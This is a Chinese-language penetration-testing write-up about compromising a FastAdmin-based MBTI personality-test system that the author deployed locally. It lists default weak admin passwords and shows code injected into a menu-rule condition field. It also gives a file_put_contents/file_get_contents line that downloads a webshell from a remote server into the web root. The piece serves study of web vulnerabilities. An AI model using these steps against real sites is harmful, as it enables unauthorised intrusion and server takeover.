某MBTI性格测试系统后台Getshell

在淘宝购买了性格测试系统源代码进行环境部署,后进行渗透测试
淘宝源码链接:https://item.taobao.com/item.htm?ft=t&id=790798788255
(自己学习(代码审计、算法、环境搭建)知识技能提升)

环境准备

集成环境选的是小皮 phpstudy

创建网站,将源代码放入网站根目录配置好数据库信息和端口后

访问目标端口

漏洞发现

常规信息搜集

1、URL接口扫描是否存在敏感信息 找到后台管理界面--(PHP FastAdmin管理项目)

2、因为是内网自己搭建的环境就每天做端口扫描

3、分析网址信息

根据信息搜集 发现管理系统是PHP FastAdmin项目

FastAdmin 是基于ThinkPHP5和Bootstrap的极速后台开发框架。 基于ThinkPHP行为功能实现的插件机制,拥有丰富的插件和扩展,可直接在线安装卸载 。 基于完善的Auth权限控制管理、无限父子级权限分组、可自由分配子级权限、一个管理员可同时属于多个组别 。

进一步信息搜集js是否存在敏感接口

/s/diaosu/admin
/index.php
/s/admin_aspcms
/mbti/index/pay/sn/.html
jQuery v2.1.4 
FastAdmin项目
php 后端开发语言

根据源代码中提供的后台说明文档,访问到管理后台

弱口令测试登陆成功

admin/admin
admin/123456
admin/admin123
admin/admin123456
root/root
root/root123
root/123456
root/

进入后台找功能点getshell。后台默认会有插件管理功能，但是我们在后台没有找到这个功能，我们直接访问插件管理的地址

尝试离线上传木马getshell失败了.....

漏洞利用

接着翻后台，发现在菜单规则中可以创建规则条件，尝试在功能点中写入phpinfo()

然后来到管理员管理中，添加一个管理员。所属组为二级管理员组！！！

添加完成之后，重新用新添加的账户登录后台，可以发现phpinfo()被成功执行。

通过搜索$_SERVER[‘DOCUMENT_ROOT’]获取网站根目录，

找到根路径后注销账户，准备一个webshell木马名为shell.php，放在自己的服务器上，使用python启动一个临时web。

回到管理后台当中，在同样的位置写入如下语句，将远程服务器的webshell木马下载到网站根目录。

file_put_contents('/xxx/xxx/xxx/shell.php',file_get_contents('远程http服务IP/shell.php'))

webshell木马已被成功写入网站根目录

远程连接成功!

总结

浏览网站—发现管理后台为FastAdmin—>通过弱口令进入后台—>规则条件中写入phpinfo()—>获得网站根目录—>规则条件中写入webshell